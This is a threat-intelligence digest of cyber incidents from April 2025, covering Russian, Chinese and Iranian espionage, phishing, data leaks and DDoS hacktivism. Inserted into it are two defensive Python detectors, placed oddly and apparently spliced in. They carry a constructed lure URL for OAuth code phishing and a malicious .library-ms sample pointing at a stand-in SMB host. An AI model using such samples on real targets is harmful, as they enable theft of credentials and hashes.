{"id":992324,"date":"2025-11-03T00:45:28","date_gmt":"2025-11-02T21:45:28","guid":{"rendered":"https:\/\/gpss.ro\/threat-intelligence\/cyber-brief-25-05-april-2025\/"},"modified":"2025-11-03T00:45:28","modified_gmt":"2025-11-02T21:45:28","slug":"cyber-brief-25-05-april-2025","status":"publish","type":"threat_intelligence","link":"https:\/\/delve.ro\/ro\/threat-intelligence\/cyber-brief-25-05-april-2025\/","title":{"rendered":"Cyber Brief 25-05 &#8211; April 2025"},"content":{"rendered":"<div id=\"content-en\" class=\"lang-content\" style=\"display: block;\">\n            <div 
class=\"article-content\"><h2 id=\"cyber-brief-april-2025\">Cyber Brief (April 2025)<\/h2><p>May 2, 2025 - Version: 1<\/p><p class=\"tlp-type clear\">TLP:CLEAR<\/p><h2 id=\"executive-summary\">Executive summary<\/h2><ul><li><p>We analysed 311 open source reports for this Cyber Brief<sup class=\"footnote-ref\" id=\"fnref-1\"><a href=\"#fn-1\">1<\/a><\/sup>.<\/p><\/li><li><p><strong>Policy, cooperation, and law enforcement.<\/strong> The FBI sought help to identify Chinese hackers breaching telecoms. The US launched a programme to shield sensitive data from foreign threats. Trump dismissed the NSA director following advice from a far-right activist, per the Washington Post. China tacitly admitted cyberattacks on US critical infrastructure, framed as a response to US support for Taiwan. It also restricted rare earth exports and banned Chinese firms from engaging with US defence contractors.<\/p><\/li><li><p><strong>Cyberespionage and prepositioning.<\/strong> French, German, and Dutch authorities have linked recent cyberattacks to Russian state-backed actors, including cyberespionage against diplomatic and research institutions, and sabotage attempts on critical infrastructure. A Member of the European Parliament revealed being targeted by Iran-linked hackers in a cyberespionage attempt. The North Korea-linked DPRK IT Workers campaign is expanding globally, with a focus on Europe. Still in Europe, new cases of mercenary spyware were reported, targeting journalists and activists. Globally, researchers observed the suspected Chinese UNC5221 threat actor actively exploiting a critical Ivanti Connect Secure vulnerability, while a Chinese APT group targeted the Russian government. Additionally, China accused US intelligence of targeting a Chinese cryptographic firm. 
Notably, Pakistan-linked APT36 exploited the Pahalgam attack theme to target the Indian government.<\/p><\/li><li><p><strong>Cybercrime.<\/strong> The Tycoon2FA phishing kit now uses advanced evasion techniques, while a phishing campaign impersonating Cloudflare leverages Telegram to filter victim IPs. Lazarus continues targeting cryptocurrency platforms with fake job interviews, and the Cookie-Bite proof-of-concept shows how a Chrome extension can be used to bypass MFA. Meanwhile, a Google DKIM flaw is being exploited for nearly undetectable phishing attacks.<\/p><\/li><li><p><strong>Data exposure and leaks.<\/strong> Notable cases of data leaks affected four sectors, namely public administration, telecommunications, technology and transport.<\/p><\/li><li><p><strong>Disruption and destruction.<\/strong> Chinese authorities accused the US NSA of launching cyberattacks during the 2025 Asian Winter Games in Harbin with the aim of disrupting critical systems and stealing sensitive information.<\/p><\/li><li><p><strong>Information operations.<\/strong> The Czech Prime Minister's social media account was compromised and used to post false messages, including about a Russian attack on Czech soldiers. Lithuania warned of Russian and Belarusian hybrid activity towards the Belarusian diaspora. 
Japanese media reported on China using AI in information operations targeting Taiwan.<\/p><\/li><li><p><strong>Hacktivism.<\/strong> In Europe, Russia-linked supposed hacktivists targeted various entities, including Finnish election-related organisations and Dutch organisations, while a coalition of hacktivists dubbed \"Holy League\" targeted the British military with DDoS attacks.<\/p><\/li><\/ul><h2 id=\"europe\">Europe<\/h2><h3 id=\"cyber-policy-and-law-enforcement\">Cyber policy and law enforcement<\/h3><p><strong>Czech government sanctioned Russian GRU officer<\/strong><br> On April 2, the Czech government added journalist Natalia Sudliankov\u00e1 and GRU officer Alexei Shavrov to its sanctions list for ties to Russian military intelligence. Both are accused of supporting Russian-state influence campaigns and information operations in Czechia. Sudliankov\u00e1 was ordered to leave the country within 30 days. <code>russia<\/code> <code>sanctions<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/ct24.ceskatelevize.cz\/clanek\/domaci\/vlada-rozsirila-sankcni-seznam-o-dvojici-spojenou-s-ruskou-gru-359667\">link<\/a> <\/p><p><strong>Operation Endgame brings down Smokeloader customers<\/strong><br> On April 9, Europol announced a new sweeping operation, conducted in early 2025 under Operation Endgame, against customers of the Smokeloader pay-per-install botnet. Operation Endgame is a cooperation initiative between Europol, the police forces of several EU countries, the US, and Eurojust, which led to the takedown of the biggest malware droppers in May 2024. The follow-up operation led to arrests, house searches, and arrest warrants against customers of the botnet. 
<code>takedown<\/code> <code>arrests<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.europol.europa.eu\/media-press\/newsroom\/news\/operation-endgame-follow-leads-to-five-detentions-and-interrogations-well-server-takedowns\">link<\/a> <\/p><p><strong>Six cybercriminals arrested in Spain for AI scam<\/strong><br> On April 7, Spain\u2019s Polic\u00eda Nacional announced the arrest of six individuals belonging to a criminal organisation that scammed over 19 million euros from victims worldwide. The group used artificial intelligence to create fake ads in which well-known national figures appeared to recommend investment products; the victims were selected via algorithms. <code>arrests<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.policia.es\/_es\/comunicacion_prensa_detalle.php?ID=16521\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning\">Cyberespionage and prepositioning<\/h3><p><strong>French authorities attribute APT28 cyberespionage campaign to Russian state interests<\/strong><br> On April 29, the French cybersecurity agency ANSSI reported that APT28, a Russian-linked threat group, had targeted the French government, diplomatic, and research sectors between 2021 and 2024. These cyberattacks aimed to gather intelligence and are part of broader operations affecting Europe, Ukraine, and North America. The attacks continue amid Russia's ongoing war against Ukraine. ANSSI and its partners identified multiple infection chains used in these campaigns. 
<code>russia<\/code> <code>diplomacy<\/code> <code>research<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.cert.ssi.gouv.fr\/cti\/CERTFR-2025-CTI-006\/\">link<\/a> <\/p><p><strong>German intelligence looking into likely Russia-linked cyberattack targeting research organisation<\/strong><br> On April 8, Germany's Federal Office for Information Security (BSI) and the Federal Office for the Protection of the Constitution (BfV) announced they were investigating a cyberattack targeting the German Association for East European Studies (DGO), an organisation specialised in international relations. Threat actors breached DGO at the end of March and accessed their e-mails. German intelligence officials say that they suspect the threat actors are Russia-linked, possibly APT29. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/germany-suspects-russian-cyber-attack-on-research-group\/a-72175406\">link<\/a> <\/p><p><strong>Russian hackers target Dutch critical infrastructure in first known sabotage attempt<\/strong><br> On April 22, the Dutch Military Intelligence Agency (MIVD) revealed that Russian hackers attempted to sabotage the digital control system of a Dutch public facility last year, marking the first known cyberattack on the Netherlands' critical infrastructure. The agency warned of growing threats from both Russia and China, highlighting Russia\u2019s sabotage efforts in the North Sea and increasing cyber operations against European nations supporting Ukraine. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/dutch-intelligence-reports-russian-cyber-attack\/a-72309443\">link<\/a> <\/p><p><strong>Russia-linked threat actors target Microsoft OAuth workflows<\/strong><br> On April 22, Volexity published a blog post on Russia-linked phishing campaigns abusing Microsoft OAuth 2.0 authentication workflows to target entities with ties to Ukraine. 
The threat actors, tracked as UTA0352 and UTA0355, impersonate European officials and use platforms like Signal and WhatsApp to lure victims into sharing Microsoft authorisation codes. <code>public administration<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\">link<\/a> <\/p><p><strong>Russia-linked Gamaredon targeted a foreign military mission in Ukraine with removable drives delivering GammaSteel<\/strong><br> Russia-linked threat actor Gamaredon targeted a foreign military mission of a Western country based in Ukraine with GammaSteel malware. Initial access was gained through infected removable drives. The infection chain involves PowerShell scripts for obfuscation and services like write.as and cURL with Tor for data exfiltration. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.security.com\/threat-intelligence\/shuckworm-ukraine-gammasteel\">link<\/a> <\/p><p><strong>MEP Hannah Neumann targeted by Iran-linked hackers in cyberespionage attempt<\/strong><br> On April 23, European Parliament member Hannah Neumann revealed that her office was targeted by a Tehran-linked cyberespionage operation. Hackers impersonated trusted contacts to deliver malware to her laptop. The attack, attributed to Iranian group APT42, was blocked before any data was stolen. Neumann, chair of the EU-Iran delegation, believes the attempt aimed to intimidate her due to her critical stance on Iran's regime. 
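Added worked example for the Microsoft OAuth item above; it is not code from the brief or from Volexity. It triages an OAuth authorize URL the way a mail gateway or an analyst would, flagging the combination the lure depends on: a genuine Microsoft login endpoint, the authorization-code flow, a first-party client, and a redirect that lands the code on a page the victim can read back to the attacker. The Visual Studio Code client ID, the insiders.vscode.dev redirect host and the example.org allow-list are assumptions for illustration, not details from the brief.

```python
"""Triage of Microsoft OAuth 2.0 authorize URLs used in authorization-code phishing.

Added example, not code from the brief or from Volexity. The lure is a genuine
login.microsoftonline.com URL whose parameters the attacker chose: the victim
signs in, is redirected to a page that displays the authorization code, and is
talked into pasting that code back to the attacker, who redeems it for tokens.
Because the login domain is real, the useful signals are in the parameters.
"""
from urllib.parse import parse_qs, urlsplit

# ASSUMPTION (not in the brief): public client IDs of first-party Microsoft
# apps that public reporting on this technique has seen abused. The value
# below is the well-known Visual Studio Code client ID.
WATCHED_CLIENT_IDS = {
    "aebc6443-996d-45c2-90f0-388ff96faa56": "Visual Studio Code",
}
# ASSUMPTION: redirect hosts of your own registered applications.
ORG_REDIRECT_ALLOWLIST = {"portal.example.org", "login.example.org"}
MS_AUTHORIZE_HOSTS = {"login.microsoftonline.com", "login.microsoft.com"}


def analyse_authorize_url(url: str) -> dict:
    """Return client ID, redirect host, findings and a coarse risk level."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)

    def first(key: str) -> str:
        return params.get(key, [""])[0]

    client_id = first("client_id")
    redirect_host = (urlsplit(first("redirect_uri")).hostname or "").lower()
    result = {"client_id": client_id, "redirect_host": redirect_host, "findings": []}

    if parts.hostname not in MS_AUTHORIZE_HOSTS or "/oauth2/" not in parts.path:
        result["findings"].append("not a Microsoft authorize endpoint")
        result["risk"] = "n/a"
        return result

    if first("response_type") == "code":
        result["findings"].append("authorization-code flow: a pasted code can be redeemed for tokens")
    if client_id in WATCHED_CLIENT_IDS:
        result["findings"].append(f"first-party client on watch-list: {WATCHED_CLIENT_IDS[client_id]}")
    if redirect_host and redirect_host not in ORG_REDIRECT_ALLOWLIST:
        result["findings"].append(f"redirect_uri host not on allow-list: {redirect_host}")

    hits = len(result["findings"])
    result["risk"] = "high" if hits == 3 else "medium" if hits == 2 else "low"
    return result


# Constructed sample of a lure URL: real endpoint, attacker-chosen parameters.
# The redirect target is an ASSUMPTION taken from public reporting.
LURE_URL = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=aebc6443-996d-45c2-90f0-388ff96faa56"
    "&response_type=code"
    "&redirect_uri=https%3A%2F%2Finsiders.vscode.dev%2Fredirect"
    "&scope=openid%20profile%20offline_access"
    "&state=constructed-sample"
)
# Constructed sample of an organisation's own app (placeholder client ID).
BENIGN_URL = (
    "https://login.microsoftonline.com/contoso.onmicrosoft.com/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555"
    "&response_type=code"
    "&redirect_uri=https%3A%2F%2Fportal.example.org%2Fsignin-oidc"
    "&scope=openid"
)

if __name__ == "__main__":
    for name, url in (("lure", LURE_URL), ("benign", BENIGN_URL)):
        verdict = analyse_authorize_url(url)
        print(f"{name}: risk={verdict['risk']}")
        for finding in verdict["findings"]:
            print("  -", finding)
```

Because the login page is Microsoft's own, URL reputation alone will not catch this; the same application ID can also be searched for in Entra ID sign-in logs to find sign-ins that completed, and Conditional Access can restrict that client to users who actually need it.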
<code>iran<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.politico.eu\/article\/european-parliament-iran-delegation-chair-victim-tehran-linked-hacking-hannah-neumann\/\">link<\/a> <\/p><p><strong>Chinese mobile interconnect providers pose surveillance risks<\/strong><br> On April 17, iVerify, a cybersecurity company, highlighted that China's state-owned mobile interconnect providers are integral to global mobile traffic, routing data for over 60 operators across 35 countries, including in Europe. iVerify emphasised the risk of man-in-the-middle attacks by such providers, which could intercept traffic wherever it is routed over outdated, unencrypted signalling protocols like SS7 and Diameter. <code>china<\/code> <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/iverify.io\/blog\/abusing-data-in-the-middle-surveillance-risks-in-china-s-state-owned-mobile-ecosystem\">link<\/a> <\/p><p><strong>North Korea-linked DPRK IT Workers campaign expands globally with a focus on Europe<\/strong><br> On April 1, Google Cloud reported that the North Korea-linked DPRK IT Workers campaign has expanded. While the United States remains a key target, over the past months DPRK IT workers have encountered challenges in seeking and maintaining employment in the country. Google assesses that the campaign has expanded globally, with a notable focus on Europe. DPRK IT workers reportedly sought employment with multiple organisations within Europe, particularly in the defence industrial base and government sectors. 
<code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-it-workers-expanding-scope-scale\">link<\/a> <\/p><p><strong>Two Serbian journalists targeted with Pegasus spyware in February 2025<\/strong><br> On March 28, Amnesty International reported that two journalists from the Balkan Investigative Reporting Network (BIRN), an award-winning Serbian network of investigative journalists, were targeted with NSO Group\u2019s Pegasus spyware. According to Amnesty International\u2019s investigation, the intrusion happened in February 2025. This is the third time in two years that Amnesty International\u2019s Security Lab has found NSO Group\u2019s Pegasus spyware being used against civil society in Serbia. <code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.amnesty.org\/en\/latest\/news\/2025\/03\/serbia-birn-journalists-targeted-with-pegasus-spyware\/\">link<\/a> <\/p><p><strong>EU country WhatsApp users among victims of 2019 NSO spyware campaign<\/strong><br> On April 9, the online news outlet TechCrunch published an article about court documents revealing the locations of WhatsApp users targeted by NSO spyware in 2019. At the time, more than 100 human rights activists, journalists, and civil society members were among a total of around 1,400 targeted users. It now appears that the victims included users in Spain, the Netherlands, Hungary, France, and the United Kingdom. 
<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/techcrunch.com\/2025\/04\/09\/court-document-reveals-locations-of-whatsapp-victims-targeted-by-nso-spyware\/\">link<\/a> <\/p><p><strong>Apple warns users, including a journalist and an activist in Europe, of spyware targeting<\/strong><br> On April 29, Apple notified users in 100 countries that they may have been targeted with government spyware, including Italian journalist Ciro Pellegrino and Dutch activist Eva Vlaardingerbroek. The alerts follow similar warnings by Apple and other tech firms, amid investigations into mercenary spyware allegedly sold to governments and used against journalists, activists, and NGOs. <code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.engadget.com\/cybersecurity\/apple-sends-spyware-warnings-to-iphone-users-in-100-countries-142547474.html\">link<\/a><\/p><p><strong>Suspected data breach in Finnish Foreign Ministry\u2019s remote access service<\/strong><br> On March 27, the Finnish Ministry for Foreign Affairs detected suspicious activity in its remote access service, raising concerns about a possible data breach. In response, the Ministry swiftly disabled the service and launched an internal investigation. The incident was reported to the National Bureau of Investigation and cybersecurity authorities for further analysis. The Ministry emphasised its commitment to securing its systems and mitigating any potential risks. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/um.fi\/current-affairs\/-\/asset_publisher\/gc654PySnjTX\/content\/ulkoasiainhallinnon-etayhteyspalvelussa-tietomurtoepaily\">link<\/a> <\/p><p><strong>Polish political party targeted ahead of Polish Presidential elections<\/strong><br> On April 2, Poland's Prime Minister Donald Tusk posted on X that his political party had been the target of a cyberattack and suggested it had Eastern origins. 
Donald Tusk said his Civic Platform party's computer system was targeted, ahead of the upcoming presidential election. The head of Tusk's office later told Polish media that the cyberattack consisted of an attempt to take control of computers of employees of the Civic Platform office and the election staff. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.euronews.com\/my-europe\/2025\/04\/02\/polands-pm-donald-tusk-says-his-partys-computer-systems-targeted-in-cyberattack\">link<\/a> <\/p><h3 id=\"cybercrime\">Cybercrime<\/h3><p><strong>NTLM exploit CVE-2025-24054 actively abused via malicious .library-ms files<\/strong><br> On April 16, Check Point reported active exploitation of CVE-2025-24054, an NTLM hash disclosure vulnerability triggered by malicious .library-ms files. Despite Microsoft's patch on March 11, attackers began leveraging the flaw by March 19, targeting entities in Poland and Romania via malspam campaigns. The exploit requires minimal user interaction, such as right-clicking or navigating to a folder, and resembles the earlier CVE-2024-43451 vulnerability. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/research.checkpoint.com\/2025\/cve-2025-24054-ntlm-exploit-in-the-wild\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction\">Disruption and destruction<\/h3><p><strong>Cyberattack disrupts Spanish water supplier Aig\u00fces de Matar\u00f3<\/strong><br> On April 23, a cyberattack hit Spanish water supplier Aig\u00fces de Matar\u00f3, affecting corporate systems and its website but leaving water supply and quality controls intact. Aig\u00fces de Matar\u00f3 stated that the attack could inconvenience its subscribers who became unable to access corporate services, and might experience delays for billing and other administrative procedures. The nature of the attack remains unconfirmed. 
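Added worked example for the CVE-2025-24054 item above (under Cybercrime); it is not code from the brief or from Check Point. A .library-ms file is plain XML, so the cheapest triage step for mail attachments and file shares is to parse it and flag any library whose url element points at a share outside the organisation, since Explorer will try to connect to that host and offer NTLM credentials when it renders the file. The trusted DNS suffix and both sample files are constructed for the example.

```python
"""Scanner for Windows .library-ms files that point at remote SMB shares.

Added example, not code from the brief or from Check Point. A .library-ms
file is an XML document; when Explorer renders one whose <url> element names
a remote share, Windows attempts to connect to that share and, on a default
configuration, offers the user's NTLM credentials. Flagging .library-ms files
with external <url> targets is therefore a cheap triage step.
"""
from __future__ import annotations

import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# \\host\share[\path]  (UNC).  Group 1 is the host.
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/].*)?$")
# ASSUMPTION: DNS suffixes of your own file servers.
TRUSTED_SUFFIXES = (".corp.example",)


def _local_name(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def extract_locations(xml_text: str) -> list[str]:
    """Return the text of every <url> element, whatever namespace it is in."""
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iter() if _local_name(el.tag) == "url" and el.text]


def remote_host(location: str) -> str | None:
    """Host part of a UNC or file:// location; None for local paths."""
    match = UNC_RE.match(location)
    if match:
        return match.group(1)
    if location.lower().startswith("file://"):
        return urlsplit(location).hostname or None
    return None


def is_external(host: str, trusted_suffixes=TRUSTED_SUFFIXES) -> bool:
    """True unless the host is a private/loopback IP, a single-label name, or a trusted FQDN."""
    host = host.lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
        return not (ip.is_private or ip.is_loopback or ip.is_link_local)
    except ValueError:
        pass
    if "." not in host:          # NetBIOS-style name: resolves only on the local network
        return False
    return not any(host.endswith(suffix) for suffix in trusted_suffixes)


def scan_library_ms(xml_text: str, trusted_suffixes=TRUSTED_SUFFIXES) -> list[dict]:
    """Return one finding per <url> that would make Explorer contact an external host."""
    findings = []
    for location in extract_locations(xml_text):
        host = remote_host(location)
        if host and is_external(host, trusted_suffixes):
            findings.append({"location": location, "host": host})
    return findings


# Constructed sample shaped like a malicious library file; example.net is a
# reserved documentation domain standing in for attacker infrastructure.
MALICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\share.example.net\documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed benign sample: an internal file server and a local folder.
BENIGN = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Team documents</name>
  <version>1</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\fs01.corp.example\public</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, scan_library_ms(sample))
```

Two caveats: the scan covers only the library file itself, not an archive or shortcut that wraps it, and blocking outbound SMB (TCP 445) at the perimeter together with NTLM restrictions removes the credential leak even when a file gets through.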
<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/therecord.media\/cyberattack-water-supplier-barcelona-spain\">link<\/a> <\/p><h3 id=\"information-operations\">Information operations<\/h3><p><strong>Czech Prime Minister Petr Fiala social media account compromised<\/strong><br> On April 8, hackers breached Czech Prime Minister Petr Fiala's X (formerly Twitter) account, posting false messages, including about a Russian attack on Czech soldiers. The malicious activity aimed to mislead followers and potentially damage the Prime Minister's reputation. <code>russia<\/code> <code>social media<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.reuters.com\/world\/europe\/czech-pm-fialas-x-account-attacked-with-fake-posts-2025-04-08\/\">link<\/a> <\/p><p><strong>Lithuania State Security warns of Russian and Belarusian hybrid activity towards Belarusian diaspora<\/strong><br> On April 23, the State Security Department of Lithuania publicly reported about hybrid attacks planned by Russian and Belarusian intelligence services against Belarusian diaspora living in Lithuania. The attacks involved information operation components such as videos allegedly filmed by Litvinist groups and directed against Lithuania being spread on social networks. The goal of the attacks would reportedly be to incite ethnic tension and increase the sense of insecurity in Lithuania. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.vsd.lt\/en\/2025\/04\/23\/priesiskos-zvalgybos-tarnybos-bando-organizuoti-smurtinius-ispuolius-pries-lietuvoje-gyvenancius-baltarusius\/\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks\">Data exposure and leaks<\/h3><p><strong>Major data leak under investigation at Dutch ministries<\/strong><br> On April 10, a significant data leak affecting multiple Dutch ministries, including Economic Affairs and Climate and Green Growth, came to light. Dutch authorities have not confirmed if any personal data was accessed or stolen. 
The Interior Ministry is leading the investigation, and the Dutch Data Protection Authority has been notified, though the full scope and impact remain unclear. <code>public administration<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/nltimes.nl\/2025\/04\/10\/major-data-leak-discovered-multiple-dutch-ministries-impact-currently-unclear\">link<\/a> <\/p><p><strong>Samsung Germany data breach exposes 270,000 customer support records<\/strong><br> On April 14, German media revealed that on March 30, Samsung Germany customer data was compromised in a breach at its logistics provider, Spectos, which exposed a support database. The breach led to the theft of 270,000 customer support records, now listed on Have I Been Pwned, including e-mail addresses, names, purchases, and tracking numbers, which could be misused for phishing; access to core systems was reportedly blocked and the direct identity theft risk is considered low. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.heise.de\/en\/news\/Have-I-Been-Pwned-270-000-data-records-stolen-from-Samsung-integrated-10350941.html\">link<\/a> <\/p><p><strong>Europcar GitLab breach exposes data of up to 200,000 customers<\/strong><br> In March 2025, a hacker gained access to Europcar Mobility Group\u2019s private GitLab repositories, stealing 37 GB of data including source code, SQL backups, and configuration files. The breach may impact up to 200,000 customers, with names and e-mail addresses exposed from Europcar\u2019s Goldcar and Ubeeqo brands. Europcar confirmed the GitLab breach, notified authorities, and is contacting affected users. No passwords or payment information were reportedly compromised. 
<code>transport<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/europcar-gitlab-breach-exposes-data-of-up-to-200-000-customers\/\">link<\/a> <\/p><h3 id=\"hacktivism\">Hacktivism<\/h3><p><strong>Russia-linked supposed hacktivists target Finnish election-related organisations<\/strong><br> On April 8, according to Finnish newspaper Yle, Russia-linked supposed hacktivists NoName057(16) claimed responsibility for several DDoS attacks that targeted almost all Finnish parliamentary parties, as well as several organisations and websites of individuals. Election-related websites were among the targets. The group claims the attacks respond to President Stubb's proposed Ukraine ceasefire. <code>russia<\/code> <code>election<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/yle.fi\/a\/74-20154753\">link<\/a> <\/p><p><strong>Pro-Russia hacktivists target Dutch public organisations in DDoS attacks<\/strong><br> On April 30, pro-Russia threat actor NoName057(16) disrupted Dutch public and private services with ongoing DDoS attacks, targeting websites across several provinces and municipalities. The group claimed retribution for military aid to Ukraine. Despite service disruptions, Dutch officials confirmed no internal systems were compromised. The cybercrime actor continues its campaign through its DDoSia platform. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ncsc.nl\/actueel\/nieuws\/2025\/04\/30\/lopende-ddos-aanvallen-op-nederlandse-organisaties\">link<\/a><\/p><p><strong>Coalition of hacktivists Holy League targets British military with DDoS attacks<\/strong><br> On April 7, several media outlets reported on the Holy League, a coalition of around 90 pro-Russian and pro-Palestinian hacktivist groups, launching weekly DDoS attacks on British military and infrastructure agencies. Their mission is to conduct cyberwarfare against the allies of Ukraine and Israel. 
<code>defence<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/insight.scmagazineuk.com\/holy-league-claims-attack-on-ukraine-allies\">link<\/a> <\/p><h2 id=\"world\">World<\/h2><h3 id=\"cyber-policy-and-law-enforcement-2\">Cyber policy and law enforcement<\/h3><p><strong>FBI seeks public help to identify Salt Typhoon hackers behind telecom breaches<\/strong><br> On April 24, the FBI requested public assistance and announced a reward of up to 10 million US dollars for information to identify the Salt Typhoon hackers, a Chinese cyberespionage group responsible for breaches in U.S. and global telecom networks. These hackers gained access to sensitive data, including private communications of US officials, and are still targeting telecom providers worldwide, with ongoing investigations and potential sanctions on related Chinese firms. <code>china<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ic3.gov\/PSA\/2025\/PSA250424-2\">link<\/a> <\/p><p><strong>US implements a national security programme to protect Americans\u2019 sensitive data from foreign adversaries<\/strong><br> On April 11, the US Department of Justice began implementing a national security program under Executive Order 14117 to prevent foreign adversaries like China, Russia, and Iran from accessing Americans\u2019 sensitive personal and government-related data. The initiative aims to counter threats such as espionage and AI-enabled surveillance by restricting data transactions and enforcing new compliance measures. <code>artificial intelligence<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-implements-critical-national-security-program-protect-americans-sensitive\">link<\/a> <\/p><p><strong>Trump fires NSA Director on advice from Laura Loomer, per Washington Post<\/strong><br> On April 2, Gen. 
Timothy Haugh was dismissed as Director of the US National Security Agency (NSA), reportedly following advice from far-right activist Laura Loomer, according to The Washington Post. Loomer had urged President Trump to remove officials she deemed insufficiently loyal. The decision has drawn criticism from top Democrats, who expressed concerns about national security implications. <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/apnews.com\/article\/trump-national-security-agency-tim-haugh-ec08b455e2c1112f5c6bb1881fad73e2\">link<\/a> <\/p><p><strong>China tacitly acknowledges cyber activity targeting US infrastructure<\/strong><br> On 10 April, the Wall Street Journal reported that during a confidential meeting in Geneva in December 2024, Chinese officials indirectly signalled that Beijing had supported cyber intrusions against US critical infrastructure. The activity, reportedly linked to Volt Typhoon, was framed as a response to US support for Taiwan. US officials interpreted the remarks as a strategic warning amid escalating tensions. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.wsj.com\/politics\/national-security\/in-secret-meeting-china-acknowledged-role-in-u-s-infrastructure-hacks-c5ab37cb\">link<\/a> <\/p><p><strong>China restricts exports of rare earth minerals<\/strong><br> On 13 April, the New York Times reported that China imposed new export restrictions on rare earth minerals and magnets, requiring special licenses. These materials are crucial for semiconductor production. Additionally, China\u2019s Ministry of Commerce, alongside the General Administration of Customs, reportedly banned Chinese firms from engaging with several American companies, notably military contractors. 
<code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.nytimes.com\/2025\/04\/13\/business\/china-rare-earths-exports.html\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning-2\">Cyberespionage and prepositioning<\/h3><p><strong>Suspected Chinese UNC5221 threat actor actively exploiting critical Ivanti Connect Secure vulnerability<\/strong><br> On April 3, Ivanti disclosed CVE-2025-22457, a critical buffer overflow vulnerability in Ivanti Connect Secure VPN appliances, enabling remote code execution. Mandiant and Ivanti reported active exploitation since mid-March by UNC5221, a suspected China-nexus espionage group, deploying custom malware. A patch was released on February 11, 2025; users are urged to upgrade immediately. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/china-nexus-exploiting-critical-ivanti-vulnerability?hl=en\">link<\/a> <\/p><p><strong>Chinese APT IronHusky targets Russian government with upgraded MysterySnail malware<\/strong><br> On April 17, Kaspersky reported that Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organisations using upgraded MysterySnail RAT malware. The updated implant, observed in recent attacks, is deployed via malicious MMC scripts disguised as Word documents, which download second-stage payloads and establish persistence on compromised systems. <code>china<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/mysterysnail-new-version\/116226\/\">link<\/a> <\/p><p><strong>China accuses US intelligence of targeting Chinese cryptographic firm<\/strong><br> On April 28, China's National CSIRT (CNCERT) reported on a 2024 cyberespionage operation where a US intelligence agency targeted a leading Chinese provider of commercial cryptographic products, stealing 